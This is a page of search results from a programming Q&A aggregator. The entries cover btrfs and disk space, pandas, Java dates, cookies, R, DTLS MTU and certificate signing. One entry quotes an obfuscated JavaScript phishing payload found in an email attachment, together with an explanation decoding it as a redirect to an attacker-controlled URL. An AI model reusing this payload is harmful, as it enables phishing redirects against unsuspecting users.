Search Results

Search found 580 results on 24 pages for 'df'.

Page 8/24 | < Previous Page | 4 5 6 7 8 9 10 11 12 13 14 15  | Next Page >

  • btrfs and missing free space

    - by easteregg
    I converted my ext4 partition to btrfs and deleted the saved subvolume after doing so. Then I enabled compression (lzo) of the filesystem in the fstab file, and everything is correct so far. Then I forced the compression of all files using the defragmentation command with the parameter -c, so that the new compression is applied to all files. While doing so, I noticed that my ssd got completely filled up - before, I had 6 GB of free space. Now I've got nothing left. easteregg@x201s:~$ btrfs fi df / Data: total=50.00GB, used=49.17GB System: total=32.00MB, used=4.00KB Metadata: total=24.50GB, used=9.86GB and easteregg@x201s:~$ df -ha Filesystem Size Used Avail Use% Mounted on /dev/sda1 75G 60G 852M 99% / So now, how can I regain my free space? I expected to gain more space because of the lzo compression, not lose it. The fs is correctly mounted: easteregg@x201s:~$ mount /dev/sda1 on / type btrfs (rw,noatime,ssd,compress=lzo) Any ideas how to fix this issue?
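    A plausible explanation, given the btrfs fi df output, is chunk over-allocation: Metadata has 24.50GB allocated but under 10GB used, and defragmenting every file forces a lot of chunk churn. A balance pass often hands mostly-empty chunks back as free space. A sketch (the -dusage/-musage filters need a reasonably recent kernel and btrfs-progs; older tools only offer a plain, much slower full balance):

        # rewrite nearly-empty data and metadata chunks so their
        # space is returned to the unallocated pool
        sudo btrfs balance start -dusage=5 /
        sudo btrfs balance start -musage=5 /
        # re-check the allocation afterwards
        sudo btrfs fi df /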

    Read the article

  • After deleting log files, Ubuntu server still saying there is no space

    - by Mark
    My Ubuntu server has stopped due to a lack of disk space. I deleted some log files which had grown huge very quickly, but df -h still shows I have no space left. When I run du -sh /* I can see that I should have plenty of disk space left after deleting the logs. I ran lsof +L1 and it brought up two files: /var/log/mail.log and /var/log/mail.err. These are two logs I had deleted. I restarted apache, postfix and mysql (mysql won't restart because of the lack of disk space, I think) but df -h still shows no space.
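    This is the classic deleted-but-still-open file problem: the kernel only releases the blocks once the last file descriptor on the deleted file closes, and the lsof +L1 output shows which process is still holding the dead logs. Since mail.log and mail.err are written by the syslog daemon rather than apache or postfix, restarting that daemon (or truncating through its fd table) should release the space. A sketch, with the PID and fd numbers as placeholders to be read off the lsof output:

        # identify the process holding the deleted logs
        lsof +L1 | grep '/var/log/mail'
        # either truncate the deleted file through the holder's fd...
        : > /proc/1234/fd/7
        # ...or simply restart the daemon that writes those logs
        service rsyslog restart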

    Read the article

  • Pandas Dataframe to JSON File with Separate Records

    - by Chris
    I'm attempting to dump data from a Pandas Dataframe into a JSON file to import into MongoDB. The format I require in the file has one JSON record on each line, of the form: {<column 1>:<value>,<column 2>:<value>,...,<column N>:<value>} df.to_json(orient='records') gets close to the result, but all the records are dumped within a single JSON array. Any thoughts on an efficient way to get this result from a dataframe? UPDATE: The best solution I've come up with is the following: dlist = df.to_dict('records') dlist = [json.dumps(record)+"\n" for record in dlist] open('data.json','w').writelines(dlist)
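    Worth noting for anyone on a newer pandas (0.19 or later): to_json grew a lines=True option that writes exactly this newline-delimited records format in one call, so the manual json.dumps loop becomes unnecessary. A sketch:

        import pandas as pd

        df = pd.DataFrame({'a': [1, 2], 'b': [3, 4]})
        # one JSON object per line, ready for mongoimport
        df.to_json('data.json', orient='records', lines=True)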

    Read the article

  • Java Calendar - How to check if it's Saturday/Sunday?

    - by Cristian
    What this code does is print the dates of the current week from Monday to Friday. It works fine, but I want to ask something else: if today is Saturday or Sunday, I want it to show the next week... how do I do that? Here's my working code so far (thanks to StackOverflow!!): // Get calendar set to current date and time Calendar c = Calendar.getInstance(); // Set the calendar to Monday of the current week c.set(Calendar.DAY_OF_WEEK, Calendar.MONDAY); // Print dates of the current week starting on Monday to Friday DateFormat df = new SimpleDateFormat("EEE dd/MM/yyyy"); for (int i = 0; i <= 4; i++) { System.out.println(df.format(c.getTime())); c.add(Calendar.DATE, 1); } Thanks a lot! I really appreciate it as I've been searching for the solution for hours...
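    One approach that sidesteps locale-dependent first-day-of-week behaviour is to handle the weekend with plain date arithmetic before the loop: on Saturday jump ahead two days, on Sunday one day, otherwise snap back to this week's Monday. A sketch:

        import java.text.DateFormat;
        import java.text.SimpleDateFormat;
        import java.util.Calendar;

        public class NextWeek {
            public static void main(String[] args) {
                Calendar c = Calendar.getInstance();
                int dow = c.get(Calendar.DAY_OF_WEEK);
                if (dow == Calendar.SATURDAY) {
                    c.add(Calendar.DATE, 2);                       // Sat -> next Monday
                } else if (dow == Calendar.SUNDAY) {
                    c.add(Calendar.DATE, 1);                       // Sun -> next Monday
                } else {
                    c.set(Calendar.DAY_OF_WEEK, Calendar.MONDAY);  // Monday of this week
                }
                DateFormat df = new SimpleDateFormat("EEE dd/MM/yyyy");
                for (int i = 0; i <= 4; i++) {
                    System.out.println(df.format(c.getTime()));
                    c.add(Calendar.DATE, 1);
                }
            }
        }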

    Read the article

  • HttpWebRequest Cookie weirdness

    - by Lachman
    I'm sure I must be doing something wrong, but I can't for the life of me figure out what is going on. I have a problem where it seems that the HttpWebRequest class in the framework is not correctly parsing the cookies from a web response. I'm using Fiddler to see what is going on, and after making a request the headers of the response look like this: HTTP/1.1 200 Ok Connection: close Date: Wed, 14 Jan 2009 18:20:31 GMT Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Set-Cookie: user=v.5,0,EX01E508801E$97$2E401000t$1BV6$A1$EC$104$A1$EC$104$A1$EC$104$21O001000$1E31!90$7CP$AE$3F$F3$D8$19o$BC$1Cd$23; Domain=.thedomain.com; path=/ Set-Cookie: minfo=v.4,EX019ECD28D6k$A3$CA$0C$CE$A2$D6$AD$D4!2$8A$EF$E8n$91$96$E1$D7$C8$0F$98$AA$ED$DC$40V$AB$9C$C1$9CF$C9$C1zIF$3A$93$C6$A7$DF$A1$7E$A7$A1$A8$BD$A6$94c$D5$E8$2F$F4$AF$A2$DF$80$89$BA$BBd$F6$2C$B6$A8; expires=Sunday, 31-Dec-2014 23:59:59 GMT; Domain=.thedomain.com; path=/ Set-Cookie: accttype=v.2,3,1,EX017E651B09k$A3$CA$0C$DB$A2$CB$AD$D9$8A$8C$EF$E8t$91$90$E1$DC$C89$98$AA$E0$DC$40O$A8$A4$C1$9C; expires=Sunday, 31-Dec-2014 23:59:59 GMT; Domain=.thedomain.com; path=/ Set-Cookie: tpid=v.1,20001; expires=Sunday, 31-Dec-2014 23:59:59 GMT; Domain=.thedomain.com; path=/ Set-Cookie: MC1=GUID=541977e04a341a2a4f4cdaaf49615487; expires=Sunday, 31-Dec-2014 23:59:59 GMT; Domain=.thedomain.com; path=/ Set-Cookie: linfo=v.4,EQC|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1; expires=Sunday, 31-Dec-2014 23:59:59 GMT; Domain=.thedomain.com; path=/ Set-Cookie: group=v.1,0; expires=Sunday, 31-Dec-2014 23:59:59 GMT; Domain=.thedomain.com; path=/ Content-Type: text/html But when I look at the response.Cookies, I see far more cookies than I am expecting, with values of different cookies being split up into different cookies.
    Manually getting the headers seems to result in more weirdness, e.g. the code foreach(string cookie in response.Headers.GetValues("Set-Cookie")) { Console.WriteLine("Cookie found: " + cookie); } produces the output: Cookie found: user=v.5 Cookie found: 0 Cookie found: EX01E508801E$97$2E401000t$1BV6$A1$EC$104$A1$EC$104$A1$EC$104$21O00 1000$1E31!90$7CP$AE$3F$F3$D8$19o$BC$1Cd$23; Domain=.thedomain.com; path=/ Cookie found: minfo=v.4 Cookie found: EX019ECD28D6k$A3$CA$0C$CE$A2$D6$AD$D4!2$8A$EF$E8n$91$96$E1$D7$C8$0 F$98$AA$ED$DC$40V$AB$9C$C1$9CF$C9$C1zIF$3A$93$C6$A7$DF$A1$7E$A7$A1$A8$BD$A6$94c$ D5$E8$2F$F4$AF$A2$DF$80$89$BA$BBd$F6$2C$B6$A8; expires=Sunday Cookie found: 31-Dec-2014 23:59:59 GMT; Domain=.thedomain.com; path=/ Cookie found: accttype=v.2 Cookie found: 3 Cookie found: 1 Cookie found: EX017E651B09k$A3$CA$0C$DB$A2$CB$AD$D9$8A$8C$EF$E8t$91$90$E1$DC$C89 $98$AA$E0$DC$40O$A8$A4$C1$9C; expires=Sunday Cookie found: 31-Dec-2014 23:59:59 GMT; Domain=.thedomain.com; path=/ Cookie found: tpid=v.1 Cookie found: 20001; expires=Sunday Cookie found: 31-Dec-2014 23:59:59 GMT; Domain=.thedomain.com; path=/ Cookie found: MC1=GUID=541977e04a341a2a4f4cdaaf49615487; expires=Sunday Cookie found: 31-Dec-2014 23:59:59 GMT; Domain=.thedomain.com; path=/ Cookie found: linfo=v.4 Cookie found: EQC|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1; expires=Sunday Cookie found: 31-Dec-2014 23:59:59 GMT; Domain=.thedomain.com; path=/ Cookie found: group=v.1 Cookie found: 0; expires=Sunday Cookie found: 31-Dec-2014 23:59:59 GMT; Domain=.thedomain.com; path=/ as you can see - the first cookie in the list raw response: Set-Cookie: user=v.5,0,EX01E508801 is getting split into: Cookie found: user=v.5 Cookie found: 0 Cookie found: EX01E508801E$.......... So - what's going on here? Am I wrong? Is the HttpWebRequest class incorrectly parsing the http headers? Is the webserver that is answering the requests producing invalid http headers?
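    What the output suggests (an inference from the behaviour, not from the framework source): HTTP allows repeated headers to be folded into one comma-separated value, and the framework folds the several Set-Cookie headers together and then splits on every comma - including the commas inside "expires=Sunday, 31-Dec-2014" dates and inside the cookie values themselves. One workaround is to take the folded header raw and split it only at commas that are immediately followed by a new name= pair; a sketch (a value that itself starts with something=... right after a comma would still fool it):

        using System;
        using System.Collections.Generic;
        using System.Text.RegularExpressions;

        static class CookieSplitter
        {
            // split only at commas that begin a new "name=" pair, leaving the
            // commas inside expires dates and cookie values alone
            public static IEnumerable<string> SplitSetCookie(string folded)
            {
                return Regex.Split(folded, @",(?=\s*[\w\.\-]+\s*=)");
            }
        }

    Usage would be along the lines of: foreach (string c in CookieSplitter.SplitSetCookie(response.Headers["Set-Cookie"])) Console.WriteLine(c);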

    Read the article

  • What does this suspicious phishing code do?

    - by halohunter
    A few of my non-IT coworkers opened a .html attachment in an email message that looks extremely suspicious. It resulted in a blank screen, and it appears that some javascript code was run. <script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script> What did it do? It's beyond the scope of my programming knowledge.
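    The obfuscation here is mostly filler: each .replace() call strips junk characters out of a quoted string, and the function x() assigns the decoded URL to a property of the document. Applying the three replaces by hand, 'lDo6cDart>iro6nD' becomes location, 'hIrBeTf.' becomes href, and the long string becomes a URL, so the whole script appears to reduce to a simple drive-by redirect, roughly:

        // hand-decoded equivalent of the obfuscated script:
        //   'lDo6cDart>iro6nD' -> 'location'
        //   'hIrBeTf.'         -> 'href'
        //   'hXtHt9pH:...'     -> the URL below
        document.location.href = "http://lendermedia.com/images/z.htm";

    In other words, anyone opening the attachment is silently bounced to an attacker-controlled page; the blank screen suggests the redirect target failed to load or has since been taken down.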

    Read the article

  • Parsing a String into date with pattern:"dd/MM/yyyy"

    - by kawtousse
    Hi, I want to convert a date from the format MM/dd/yyyy (for example 04/29/2010) to 29/04/2010, to be inserted into a mysql database field typed Date. So I have this code: String dateimput=request.getParameter("datepicker"); DateFormat df = new SimpleDateFormat("dd/MM/yyyy"); Date dt = null; try { dt = df.parse(dateimput); System.out.println("date imput is:" +dt); } catch (ParseException e) { e.printStackTrace(); } but it gives me these errors: 1- date imput is:Fri May 04 00:00:00 CEST 2012 (it is not the correct value that was entered). 2- a mismatch with the mysql date type. I can not detect the error exactly. Please help.
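    The May 2012 result is the giveaway: SimpleDateFormat is lenient by default, so parsing "04/29/2010" with the pattern dd/MM/yyyy reads 29 as a month number and silently rolls the calendar forward 29 months into May 2012. The parse pattern has to match the incoming text; a second formatter then produces the output form. A sketch:

        import java.text.DateFormat;
        import java.text.ParseException;
        import java.text.SimpleDateFormat;
        import java.util.Date;

        public class DateConvert {
            public static void main(String[] args) throws ParseException {
                DateFormat in = new SimpleDateFormat("MM/dd/yyyy"); // what the picker sends
                in.setLenient(false);               // fail loudly instead of rolling over
                DateFormat out = new SimpleDateFormat("dd/MM/yyyy");
                Date dt = in.parse("04/29/2010");
                System.out.println(out.format(dt)); // prints 29/04/2010
            }
        }

    For the MySQL side, a DATE column is best fed a java.sql.Date through PreparedStatement.setDate rather than a formatted string.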

    Read the article

  • The String source is unknown while using the parse method!

    - by kawtousse
    Hi everyone, I'm trying to parse a string into a valid SQL date: SimpleDateFormat df = new SimpleDateFormat("yyyy-MM-dd"); java.util.Date date = null; try { date = df.parse(dateimput); } catch (ParseException e2) { // TODO Auto-generated catch block e2.printStackTrace(); } where dateimput is what I get from my form, like this: String dateimput=request.getParameter("datepicker"); But when running I see the error: java.text.ParseException: Format.parseObject(String) failed at java.text.Format.parseObject(Unknown Source) at ServletEdition.doPost(ServletEdition.java:70) so it seems that dateimput is not being parsed, although I note that it is correctly displayed by: System.out.println("datepicker:" +dateimput); Thanks.
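    "Unknown Source" in the stack trace is only a missing-debug-info artifact, not the problem; the ParseException means the text did not match the yyyy-MM-dd pattern. Judging by the related questions, the datepicker posts dates like 04/29/2010, so the string has to be parsed with the pattern it actually arrives in and then reformatted for SQL. A sketch, assuming the picker's format is MM/dd/yyyy:

        DateFormat picker = new SimpleDateFormat("MM/dd/yyyy"); // format the form sends
        DateFormat sqlFmt = new SimpleDateFormat("yyyy-MM-dd"); // format MySQL expects
        java.util.Date d = picker.parse(dateimput);
        String forSql = sqlFmt.format(d);                       // e.g. "2010-04-29"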

    Read the article

  • Changing ylim (axis limits) drops data falling outside range. How can this be prevented?

    - by Alex Holcombe
    df <- data.frame(age=c(10,10,20,20,25,25,25),veg=c(0,1,0,1,1,0,1)) g=ggplot(data=df,aes(x=age,y=veg)) g=g+stat_summary(fun.y=mean,geom="point") Points reflect the mean of veg at each age, which is what I expected and want to preserve after changing the axis limits with the command below. g=g+ylim(0.2,1) Changing the axis limits with the above command unfortunately causes the veg==0 subset to be dropped from the data, yielding "Warning message: Removed 4 rows containing missing values (stat_summary)" This is bad because now the plot (the stat_summary mean) omits the veg==0 points. How can this be prevented? I simply want to avoid showing the empty part of the plot - the ordinate from 0 to .2 - but not drop the associated data from the stat_summary calculation.
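    The usual fix is to zoom instead of subset: ylim() (like any scale limit) discards out-of-range observations before the statistics are computed, while coord_cartesian() computes everything on the full data and merely clips the view. A sketch:

        library(ggplot2)
        df <- data.frame(age = c(10,10,20,20,25,25,25), veg = c(0,1,0,1,1,0,1))
        ggplot(df, aes(x = age, y = veg)) +
          stat_summary(fun.y = mean, geom = "point") +
          coord_cartesian(ylim = c(0.2, 1))   # zooms the view without dropping rows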

    Read the article

  • Convert object to DateRange

    - by user655832
    I'm querying an underlying PostgreSQL database using Pandas 0.8. Pandas is returning the DataFrame properly, but the underlying timestamp column in my database is being returned as a generic "object" type in Pandas. As I would eventually like to do seasonal normalization of my data, I am curious how to convert this generic "object" column to something that is appropriate for analysis. Here is my current code to retrieve the data: # get records from db example import pandas.io.sql as psql import psycopg2 # define query to get all subs created this year QRY = """ select i i, i * random() f, case when random() > 0.5 then true else false end t, (current_date - (i*random())::int)::timestamp with time zone tsz from generate_series(1,1000) as s(i) order by 4 ; """ CONN_STRING = "host='localhost' port=5432 dbname='postgres' user='postgres'" # connect to db conn = psycopg2.connect(CONN_STRING) # get some data set index on relid column df = psql.frame_query(QRY, con=conn) print "Row count retrieved: %i" % (len(df),) Thanks for any help you can render. M
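    Assuming the timestamp column comes back under the alias tsz used in the query, converting it to proper datetime values (and typically promoting it to the index for time-series work) is a one-liner in current pandas; a sketch:

        import pandas as pd

        # convert the generic object column to datetime64 values
        df['tsz'] = pd.to_datetime(df['tsz'])
        # a DatetimeIndex makes resampling and seasonal work straightforward
        df = df.set_index('tsz')

    On a release as old as 0.8 the same idea applies, though to_datetime's behaviour there may differ from modern pandas.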

    Read the article

  • Discovering maximum packet size

    - by ereOn
    I'm working on a network-related project and I am using DTLS (TLS over UDP) to secure communications. Reading the specifications for DTLS, I've noted that DTLS requires the DF flag (Don't Fragment) to be set. On my local network, if I try to send a message bigger than 1500 bytes, nothing is sent. That makes perfect sense. On Windows, sendto() reports a success but nothing is sent. I obviously cannot unset the DF flag manually since it is mandatory for DTLS, and I'm not sure whether the 1500-byte limit (the MTU?) could change in some situations. I guess it can. So, my question is: "Is there a way to discover this limit?" If not, what would be the lowest possible value? My software runs under UNIX (Linux/Mac OS X) and Windows, so different solutions for each OS are welcome ;) Many thanks.
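    On Linux the kernel keeps a path-MTU estimate per destination, and a connected UDP socket can be asked for it directly. A Linux-specific sketch (Windows has an analogous IP_MTU/IP_MTU_DISCOVER pair under Winsock on Vista and later, and the conservative portable floor is IPv4's guaranteed 576-byte reassembly size minus IP/UDP headers):

        #include <netinet/in.h>
        #include <sys/socket.h>

        /* query the kernel's current path-MTU estimate toward the peer;
         * the socket must already be connect()ed to the destination    */
        int path_mtu(int fd)
        {
            int do_pmtu = IP_PMTUDISC_DO;   /* also sets DF on outgoing packets */
            int mtu = 0;
            socklen_t len = sizeof(mtu);
            setsockopt(fd, IPPROTO_IP, IP_MTU_DISCOVER, &do_pmtu, sizeof(do_pmtu));
            if (getsockopt(fd, IPPROTO_IP, IP_MTU, &mtu, &len) < 0)
                return -1;
            return mtu;  /* subtract 28 bytes (IP+UDP) for the usable payload */
        }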

    Read the article

  • R data frame select by global variable

    - by Matt
    I'm not sure how to do this without getting an error. Here is a simplified example of my problem. Say I have this data frame DF a b c d 1 2 3 4 2 3 4 5 3 4 5 6 Then I have a variable x <- min(c(1,2,3)) Now I want to do the following y <- DF[a == x] But when I try to refer to a variable like "x" I get an error because R is looking for a column "x" in my data frame. I get the "undefined columns selected" error. How can I do what I am trying to do in R?
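    The error comes from the bare column name: inside DF[...] a plain a is looked up as a free variable, not as a column, and the single-index form selects columns rather than rows. Row subsetting needs the DF$ prefix and a comma, or subset(), which evaluates column names inside the data frame. A sketch:

        DF <- data.frame(a = 1:3, b = 2:4, c = 3:5, d = 4:6)
        x <- min(c(1, 2, 3))
        y <- DF[DF$a == x, ]       # rows where column a equals x
        y <- subset(DF, a == x)    # equivalent, with columns in scope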

    Read the article

  • Perl: Compare and edit underlying structure in hash

    - by Mahfuzur Rahman Pallab
    I have a hash of complex structure and I want to perform a search and replace. The first hash is like the following: $VAR1 = { abc => { 123 => ["xx", "yy", "zy"], 456 => ["ab", "cd", "ef"] }, def => { 659 => ["wx", "yg", "kl"], 456 => ["as", "sd", "df"] }, mno => { 987 => ["lk", "dm", "sd"] }, } and I want to iteratively search for all '123'/'456' elements, and if a match is found, I need to do a comparison of the sublayer, i.e. of ['ab','cd','ef'] and ['as','sd','df'], and in this case keep only the one with ['ab','cd','ef']. So the output will be as follows: $VAR1 = { abc => { 123 => ["xx", "yy", "zy"], 456 => ["ab", "cd", "ef"] }, def => { 659 => ["wx", "yg", "kl"] }, mno => { 987 => ["lk", "dm", "sd"] }, } So the deletion is based on the substructure, and not index. How can it be done? Thanks for the help!! Let's assume that I will declare the values to be kept, i.e. I will keep 456 = ["ab", "cd", "ef"] based on a predeclared value of ["ab", "cd", "ef"] and delete any other instance of 456 anywhere else. The search has to be for every key, so the code will go through the hash, first taking 123 = ["xx", "yy", "zy"] and comparing it against itself throughout the rest of the hash; if no match is found, do nothing. If a match is found, like in the case of 456 = ["ab", "cd", "ef"], it will compare the two, and as I have said that in case of a match the one with ["ab", "cd", "ef"] would be kept, it will keep 456 = ["ab", "cd", "ef"] and discard any other instances of 456 anywhere else in the hash, i.e. it will delete 456 = ["as", "sd", "df"] in this case.
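    A sketch of that approach, assuming the structure lives in a hashref $data and the keepers are declared up front: walk the outer keys, and for any inner key that has a declared keeper, delete the entry wherever its array differs from the keeper:

        use strict;
        use warnings;

        # declared keeper: key 456 survives only as ["ab","cd","ef"]
        my %keep = ( 456 => [qw(ab cd ef)] );

        for my $outer ( keys %$data ) {
            for my $key ( keys %{ $data->{$outer} } ) {
                next unless exists $keep{$key};
                my $got  = join "\0", @{ $data->{$outer}{$key} };
                my $want = join "\0", @{ $keep{$key} };
                delete $data->{$outer}{$key} if $got ne $want;
            }
        }

    Joining on "\0" is a cheap way to compare flat string arrays; for nested values a structural comparison (e.g. Data::Compare) would be more robust.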

    Read the article

  • missing plot title in ggplot2

    - by Ben Mazzotta
    How can I create a plot title in ggplot2? Am I making a silly syntax error? The ggplot2 docs indicate that labs(title = 'foo') should work, but I can only get the arguments x='foo' and y='foo' to work with labs(). Neither ggtitle() nor title() worked either. Here is an example. x <- rnorm(10,10,1) y <- rnorm(10,20,2) xy.df <- data.frame(x,y) qplot(x,y, data=xy.df, geom='point', color=x*y) + labs(title = "New Plot Title", x='Some Data', y='Some Other Data')
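    This is version-dependent rather than a syntax error: labs(title=...) and ggtitle() only arrived in ggplot2 0.9.1, and on earlier releases the plot title went through opts(). A sketch of both spellings:

        library(ggplot2)
        p <- qplot(x, y, data = xy.df, geom = 'point', color = x * y) +
          labs(x = 'Some Data', y = 'Some Other Data')

        p + ggtitle("New Plot Title")        # ggplot2 >= 0.9.1
        p + opts(title = "New Plot Title")   # older ggplot2 (opts was later removed)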

    Read the article

  • Compute rolling window covariance matrix

    - by user1665355
    I am trying to compute a rolling window (shifting by 1 day) covariance matrix for a number of assets. Say my df looks like this: df <- data.frame(x = 0:4, y = 5:9,z=1:5,u=4:8) What would a possible for loop look like if I want to calculate a covariance matrix on a rolling basis, shifting the window by 1 day? Or should I use some apply family function? What time series class would be preferable if I want to create a time series object for the loop above? I simply can't get it... Best Regards
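    A sketch of the plain-loop version: slide a fixed-width window down the rows and collect one covariance matrix per position in a list. (For a genuine time-series class, zoo or xts plus zoo::rollapply is the usual route, though rollapply flattens each matrix into a row, which is why a list is often more convenient here.)

        df <- data.frame(x = 0:4, y = 5:9, z = 1:5, u = 4:8)
        width <- 3                                   # window length in rows/days
        covs <- vector("list", nrow(df) - width + 1)
        for (i in seq_along(covs)) {
          covs[[i]] <- cov(df[i:(i + width - 1), ])  # 4x4 matrix for this window
        }
        covs[[1]]                                    # covariance of rows 1:3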

    Read the article

  • Using reshape + cast to aggregate over multiple columns

    - by DamonJW
    In R, I have a data frame with columns for Seat (factor), Party (factor) and Votes (numeric). I want to create a summary data frame with columns for Seat, Winning party, and Vote share. For example, from the data frame df <- data.frame(party=rep(c('Lab','C','LD'),times=4), votes=c(1,12,2,11,3,10,4,9,5,8,6,15), seat=rep(c('A','B','C','D'),each=3)) I want to get the output seat winner voteshare 1 A C 0.8000000 2 B Lab 0.4583333 3 C C 0.5000000 4 D LD 0.5172414 I can figure out how to achieve this. But I'm sure there must be a better way, probably a cunning one-liner using Hadley Wickham's reshape package. Any suggestions? For what it's worth, my solution uses a function from my package djwutils_2.10.zip and is invoked as follows. But there are all sorts of special cases it doesn't deal with, so I'd rather rely on someone else's code. aggregateList(df, by=list(seat=seat), FUN=list(winner=function(x) x$party[which.max(x$votes)], voteshare=function(x) max(x$votes)/sum(x$votes)))
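    One concrete alternative: this aggregation is one row per group with two derived columns, which fits plyr's ddply + summarise more naturally than reshape's melt/cast pair. A sketch:

        library(plyr)
        ddply(df, .(seat), summarise,
              winner    = party[which.max(votes)],
              voteshare = max(votes) / sum(votes))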

    Read the article

  • Parsing a string to date gives 01/01/0001 00:00:00

    - by kawtousse
    String dateimput=request.getParameter("datepicker"); System.out.println("datepicker:" +dateimput); DateFormat df = new SimpleDateFormat("MM/dd/yyyy"); Date dt = null; try { dt = df.parse(dateimput); System.out.println("date imput is:" +dt); } catch (ParseException e) { e.printStackTrace(); } * datepicker:04/29/2010 (the value I currently selected from the datepicker). * The field in the database is typed date. 1- date imput is:Thu Apr 29 00:00:00 CEST 2010, and at the database level it is inserted like this: 01/01/0001 00:00:00
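    The parse itself is working here - Thu Apr 29 00:00:00 CEST 2010 is exactly right for the input - so the 01/01/0001 value points at the insertion step, typically a date concatenated into the SQL as a string the database cannot read. Binding a java.sql.Date through a prepared statement avoids that; a sketch with hypothetical table and column names, where conn is the open JDBC connection:

        // dt is the java.util.Date parsed above
        java.sql.Date sqlDate = new java.sql.Date(dt.getTime());
        PreparedStatement ps =
            conn.prepareStatement("INSERT INTO mytable (mydate) VALUES (?)");
        ps.setDate(1, sqlDate);
        ps.executeUpdate();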

    Read the article

  • semicolon in C++?

    - by SysAdmin
    Here is the question: is the "missing semicolon" error really required? Why not treat it as a warning? Why am I asking this stupid question? When I compile this code int f = 1 int h=2; the compiler intelligently tells me where I am missing it. But to me it's like - "If you know it, just treat it as if it's there and go ahead. (Later I can fix the warning.)" int sdf = 1,df=2; sdf=1 df =2 Even for this code it behaves the same, i.e. even if multiple statements (without ;) are on the same line, the compiler knows. So, why not just remove this requirement? Why not behave like Python, VB, etc.?
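    One reason recovery can't be promoted to a guess: a missing semicolon is frequently ambiguous rather than merely sloppy, so the compiler would have to pick a meaning silently. A small sketch where both readings are legal C++:

        int b = 2;
        int *c = &b;

        int a = b    // semicolon forgotten here...
        *c;          // one declaration `int a = b * c;`? or `int a = b;`
                     // followed by the expression statement `*c;`?

    The compiler can point at the exact spot only because it has already committed to one parse; accepting the code would mean committing on the programmer's behalf.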

    Read the article

  • Drop Columns R Data frame

    - by Btibert3
    I have a number of columns that I would like to drop from a data frame. I know that we can drop them using something like: df$x <- NULL but I was hoping to do this with fewer commands. Also, I know that I could use this: df[ -c(1,3:6, 12) ] but I am concerned that the relative position of my variables may change. Given how powerful R is, I figured I would ask to see if there is another way beyond dropping each column one by one. Thanks in advance.
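    Name-based (rather than position-based) dropping sidesteps the concern about columns moving around; a sketch of two common spellings:

        drop <- c("x", "z")                      # columns to remove, by name
        df <- df[, !(names(df) %in% drop)]
        # or equivalently, with unquoted names:
        df <- subset(df, select = -c(x, z))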

    Read the article

  • Sign an OpenSSL .CSR with Microsoft Certificate Authority

    - by kce
    I'm in the process of building a Debian FreeRadius server that does 802.1x authentication for domain members. I would like to sign my radius server's SSL certificate (used for EAP-TLS) and leverage the domain's existing PKI. The radius server is joined to the domain via Samba and has a machine account as displayed in Active Directory Users and Computers. The domain controller I'm trying to sign my radius server's key against does not have IIS installed, so I can't use the preferred Certsrv webpage to generate the certificate. The MMC tools won't work as they can't access the certificate stores on the radius server, because they don't exist. This leaves the certreq.exe utility. I'm generating my .CSR with the following command: openssl req -nodes -newkey rsa:1024 -keyout server.key -out server.csr The resulting .CSR: ******@mis-ke-lnx:~/G$ openssl req -text -noout -in mis-radius-lnx.csr Certificate Request: Data: Version: 0 (0x0) Subject: C=US, ST=Alaska, L=CITY, O=ORG, OU=DEPT, CN=ME/emailAddress=MYEMAIL Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public Key: (1024 bit) Modulus (1024 bit): 00:a8:b3:0d:4b:3f:fa:a4:5f:78:0c:24:24:23:ac: cf:c5:28:af:af:a2:9b:07:23:67:4c:77:b5:e8:8a: 08:2e:c5:a3:37:e1:05:53:41:f3:4b:e1:56:44:d2: 27:c6:90:df:ae:3b:79:e4:20:c2:e4:d1:3e:22:df: 03:60:08:b7:f0:6b:39:4d:b4:5e:15:f7:1d:90:e8: 46:10:28:38:6a:62:c2:39:80:5a:92:73:37:85:37: d3:3e:57:55:b8:93:a3:43:ac:2b:de:0f:f8:ab:44: 13:8e:48:29:d7:8d:ce:e2:1d:2a:b7:2b:9d:88:ea: 79:64:3f:9a:7b:90:13:87:63 Exponent: 65537 (0x10001) Attributes: a0:00 Signature Algorithm: sha1WithRSAEncryption 35:57:3a:ec:82:fc:0a:8b:90:9a:11:6b:56:e7:a8:e4:91:df: 73:1a:59:d6:5f:90:07:83:46:aa:55:54:1c:f9:28:3e:a6:42: 48:0d:6b:da:58:e4:f5:7f:81:ee:e2:66:71:78:85:bd:7f:6d: 02:b6:9c:32:ad:fa:1f:53:0a:b4:38:25:65:c2:e4:37:00:16: 53:d2:da:f2:ad:cb:92:2b:58:15:f4:ea:02:1c:a3:1c:1f:59: 4b:0f:6c:53:70:ef:47:60:b6:87:c7:2c:39:85:d8:54:84:a1: b4:67:f0:d3:32:f4:8e:b3:76:04:a8:65:48:58:ad:3a:d2:c9: 3d:63 I'm trying to submit my certificate using the following certreq.exe command: certreq -submit -attrib "CertificateTemplate:Machine" server.csr I receive the following error upon doing so: RequestId: 601 Certificate not issued (Denied) Denied by Policy Module The DNS name is unavailable and cannot be added to the Subject Alternate name. 0x8009480f (-2146875377) Certificate Request Processor: The DNS name is unavailable and cannot be added to the Subject Alternate name. 0x8009480f (-2146875377) Denied by Policy Module My certificate authority has the following certificate templates available. If I try to submit via certreq.exe using "CertificateTemplate:Computer" instead of "CertificateTemplate:Machine" I get an error reporting that "the requested certificate template is not supported by this CA." My google-fu has failed me so far in trying to understand this error... I feel like this should be a relatively simple task, as X.509 is X.509 and OpenSSL generates the .CSRs in the required PKCS10 format. I can't be the only one out there trying to sign an OpenSSL-generated key on a Linux box 